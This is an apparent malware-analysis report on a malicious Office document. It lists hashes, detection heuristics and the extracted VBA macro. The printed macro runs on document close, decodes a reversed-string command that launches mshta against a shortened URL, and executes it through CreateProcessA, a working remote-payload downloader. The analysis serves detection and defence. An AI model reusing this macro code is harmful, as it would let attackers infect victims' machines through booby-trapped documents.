Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d9b74e491985265a…

MALICIOUS

Office (OOXML)

13.4 KB First seen: 2021-06-20
MD5: 75d2436cd1717e426ca7afd18dd066ad SHA-1: 7926e1cf8a0f6fd8a392674af1d780cdb110781a SHA-256: d9b74e491985265a7db087b566c238f22b6e31da025ebd0021cc09296abf7b97
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA project with a renamed part, indicating an attempt to evade detection. The presence of an Auto_Close macro suggests that malicious code will execute automatically when the document is closed. The VBA code attempts to use the CreateProcessA API to execute a command line, which is truncated in the provided evidence but strongly implies the execution of a second-stage payload. The Auto_Close macro is a common technique for initial execution after a user opens a malicious document.

Heuristics 3

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/Woltrine.bin)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Name = "Module2"
Sub auto_close()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3134 bytes
SHA-256: f352d863ab0e30346b04db3dd4a21a81879f570713dd4486af3409edfded8b80
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module2"
Sub auto_close()



Dim obj1 As New Class1

obj1.CallAzure


End Sub




Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type



Private Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal _
hObject As Long) As Long

Private Const NORMAL_PRIORITY_CLASS = &H20&
Private Const INFINITE = -1&


Public Sub MostCalls(cmdline As String)
Dim proc As PROCESS_INFORMATION
Dim start As STARTUPINFO
Dim ReturnValue As Integer



' Initialize the STARTUPINFO structure:
start.cb = Len(start)

' Start the shelled application:
ReturnValue = CreateProcessA _
(0&, _
 cmdline$, _
 0&, _
 0&, _
 1&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc)

' Wait for the shelled application to finish:

End Sub











Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public n_name As String

Function CallAzure()

Dim obj As New Class2

getName

obj. _
MostCalls n_name


End Function



Public Function NopsEsAstariksTocCallMoreThanWithin() As String
NopsEsAstariksTocCallMoreThanWithin = StrReverse(" aths")
End Function





Private Function ss(MyVar As Integer)


  Dim NopsPubliCMoreThanThat As String
   Select Case MyVar
      Case 1
         NopsPubliCMoreThanThat = "m" + NopsEsAstariksTocCallMoreThanWithin + StrReverse(".www//:ptth") + "bitly.com/asdhjwqdoqiwodma"
        
      Case 2
         b_public = "Get Value From Prime Numbers"
      Case 3
         b_public = "Get No Value as number"
      Case Else
         MsgBox "Unknown Number"
   End Select
   n_name = NopsPubliCMoreThanThat
   
End Function




Private Function getName()
getName = ss(1)



End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/Woltrine.bin 28672 bytes
SHA-256: db7adf055668be9fe8bb702532db5cd5d2768617d3572b60639632f5bf5588b0

Open this report in the interactive analyzer, or submit your own file for analysis.